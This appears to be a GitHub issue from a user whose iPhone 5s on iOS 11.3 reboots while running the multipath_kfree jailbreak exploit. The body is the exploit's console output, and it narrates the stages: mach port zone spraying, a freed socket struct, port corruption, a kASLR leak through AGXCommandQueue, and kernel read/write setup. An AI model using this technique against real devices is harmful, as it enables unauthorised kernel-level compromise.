iPhone5s fail and reboot about multipath_kfree HOT 3 OPEN

           ██╗  ██╗ ██████╗ ██████╗ ██████╗ ███████╗
           ╚██╗██╔╝██╔════╝██╔═══██╗██╔══██╗██╔════╝
            ╚███╔╝ ██║     ██║   ██║██║  ██║█████╗
            ██╔██╗ ██║     ██║   ██║██║  ██║██╔══╝
           ██╔╝ ██╗╚██████╗╚██████╔╝██████╔╝███████╗
           ╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝

Hello there debugger, thanks for debugging me, but I might be unreliable with big brother watching me (kernel panics).

Debug server process id: 356 group process id: 357
Stage 1: Exploiting the kernel.
offsets selected for iOS 11.3 or above
build_id: 15E302
sysname: Darwin
nodename: Luoei-5s
release: 17.5.0
version: Darwin Kernel Version 17.5.0: Tue Mar 13 21:32:12 PDT 2018; root:xnu-4570.52.2~8/RELEASE_ARM64_S5L8960X
machine: iPhone6,2
Your device isn't supported yet, find your offsets and add them to offsets.m in the project.
Initializing multipath_kfree bug...
Filling the zone with 10,000 machports...
Filling the zone with another 0x20 machports serving as our first port for corruption...
Creating our first socket...
Our first socket descriptor is: 3
Filling our the zone and our first port array with the remaining 68 ports...
Creating the rest of our 15 sockets...
Initializing empty messages for all of our potential first ports...
Freeing first and second in our socket struct and praying that we are still here...
Finding corrupt port in that zone so we can leak the kernel ASLR shift later...
Port 0x26d603 is corrupt!
Corrupt port: 0026D603 31
Filling ports to serve as a zone spray for finding the kASLR slide and getting r/w...
Initializing empty messages for all of our sprayed ports...
Receiving the response message from our corrupt port, leaking the address of our new contained port...
Refill port is at 0xfffffff1136c07a0
Sending an empty message to our corrupted port...
Freeing the contained port using multipath bug...
Port 0x26d603 is corrupt!
Leaking kASLR by filling the zone with userclients to AGXCommandQueue...
Receiving back from our corrupt port, leaking the address of the userclient...
Calculating the address of the vtable of AGXCommandQueue from the leaked userclient...
AGXCommandQueue vtable is at: 0xfffffff00b48d8c0
Calculating kaslr_shift, if this displays 0xffff(something) then check if the vtable offset is correct!
kaslr shift: 0xfffffff00b48d8c0
Destroying the corrupted port as we now have the kASLR slide...
Filling the zone again with some random ports so we can get kernel read write...
Setting up kernel r/w access using s1guza's gadgets...

from multipath_kfree.